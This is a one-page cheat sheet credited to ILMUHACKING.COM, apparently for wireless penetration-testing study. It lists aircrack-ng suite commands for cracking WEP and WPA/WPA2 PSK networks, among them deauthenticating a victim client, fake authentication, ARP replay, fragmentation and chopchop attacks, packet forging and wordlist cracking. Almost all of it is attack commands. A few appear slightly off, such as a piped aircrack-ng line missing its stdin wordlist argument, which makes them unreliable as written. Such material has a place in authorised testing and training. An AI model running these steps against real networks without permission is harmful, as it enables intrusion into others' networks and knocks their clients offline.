## WiFu Cheat Sheet 1.0

by ILMUHACKING.COM

## Cracking WEP SKA/OA and WPA/WPA2 PSK Network with at least One Client Connected

1. Going to monitor mode: airmon-ng start <if> <channel>

- 2. Capture IVs and PRGA XOR for WEP or Handshake Packet for WPA/WPA2
- airodump-ng -c <channel> --bssid <AP\_MAC> -w <filename> <if>
- 3. WEP SKA and WPA/WPA2 Only: Deauthenticate a client
  - aireplay-ng -0 1 -a <AP\_MAC> -c <VICTIM\_MAC> <if>
- 4. WEP Only: Perform fake authentication
  - a. Open Authentication: aireplay-ng -1 0 -e <SSID> -a <AP\_MAC> -h <OUR\_MAC> <if>
  - b. Shared Key Authentication: aireplay-ng -1 0 -e <SSID> -y <PRGA\_XOR> -a <AP\_MAC> -h <OUR\_MAC> <if>
- 5. WEP Only: Perform ARP request replay
- aireplay-ng -3 -b <AP\_MAC> -h <OUR\_MAC> <if>
- 6. Crack key
  - a. WPA/WPA2:

•

- aircrack-ng -w <wordlist\_file> -b <AP\_MAC> <dumpfile>
  - john --stdout --incremental:all | aircrack-ng -b <AP\_MAC> -w <dumpfile>
- john --stdout --rules --wordlist=<wordlist\_file> | aircrack-ng -b <AP\_MAC> -w <dumpfile>
- b. WEP: aircrack-ng [-n 64/128/152/256/512] -b <AP\_MAC> <dumpfile>

## **Cracking Clientless Open Authentication WEP Network**

- 1. Going to monitor mode: airmon-ng start <if> <channel>
- 2. Perform fake authentication
  - aireplay-ng -1 0 -e <SSID> -a <AP\_MAC> -h <OUR\_MAC> <if>
- 3. Obtain PRGA XOR bits
  - a. Fragmentation attack: aireplay-ng -5 -b <AP\_MAC> -h <OUR\_MAC> <if>
  - b. Chopchop attack: aireplay-ng -4 -b <AP\_MAC> -h <OUR\_MAC> <if>
- 4. Create ARP packet using PRGA XOR bits
- packetforge-ng -0 -a <AP\_MAC> -h <OUR\_MAC> -k 255.255.255.255 -1 255.255.255.255 -y <xorfile> -w <outfile> 5. Capture IVs
- airodump-ng -c <channel> --bssid <AP\_MAC> -w <filename> <if>
- 6. Inject ARP packet that we have created in step 4
- aireplay-ng -2 -r <packetfile> <if>
- 7. Crack key
  - aircrack-ng [-n 64/128/152/256/512] -b <AP\_MAC> <dumpfile>